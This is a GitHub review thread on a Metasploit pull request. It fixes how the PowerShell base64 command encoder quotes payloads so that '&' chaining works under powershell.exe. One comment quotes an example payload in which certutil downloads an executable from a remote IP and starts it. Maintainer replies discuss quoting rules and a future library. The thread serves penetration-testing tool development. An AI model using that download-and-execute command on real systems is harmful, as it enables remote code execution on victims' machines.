modules/encoders/cmd/powershell_base64.rb

```diff
@@ -45,7 +45,7 @@ def encode_block(state, buf)
   end
 
   def encode_buf(buf)
-    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
+    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c 'start #{buf.gsub("'", "''")} '"))
```

Comment:
Context, an example payload such as:

```
cmd.exe /c start certutil -urlcache -f http://192.168.64.128:9392/QiKwY0fCK5kLLNWx9q7Ljw C:\Users\Administrator\rSvKvynzjqWO.exe & start /B C:\Users\Administrator\rSvKvynzjqWO.exe 
```

Behaves differently in when running in powershell.exe vs in the context of cmd.exe, due to the `&`

top - `&` working in cmd.exe
bottom - `&` not working in powershell.exe 

![image](https://github.com/rapid7/metasploit-framework/assets/60357436/0bfe319f-c49c-437c-80ac-7aa5bab867dc)

before quotes:

```
C:\Users\vagrant>powershell -Command "cmd.exe /c echo hello & echo world"
At line:1 char:23
+ cmd.exe /c echo hello & echo world
+                       ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : AmpersandNotAllowed
```

Versus after with quotes:
```
C:\Users\vagrant>powershell -Command "cmd.exe /c 'echo hello & echo world'"
hello
world
```

Reply:
Yup, and for reference the rules are Powershell quoting are here https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_quoting_rules?view=powershell-7.3

For a more long term solution (with YARD docs even) it'd be great if we could please add this into a library such as I proposed here in PR #18021 https://github.com/rapid7/metasploit-framework/pull/18021/files#diff-49e95930b5c9ff8376e771067de12b8552cb86acc4ebe2cfd4c0ad78ca945ecf. The changes proposed in that PR do basically the same thing but for cmd.exe instead of powershell.exe.

Reply:
Updating this with a comment that incorporates elements from both of your feedback. Thanks for the detailed explanations!

Reply:
As for the long term solution, I plan to add a new library functionality in soon to fix this, but depending on timing lets consider that a non-blocking element for now as we can easily add that in later and then update this code at the same time.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18018/commits/85f874a6d7b6c188eca83cd16d885b88a501f04e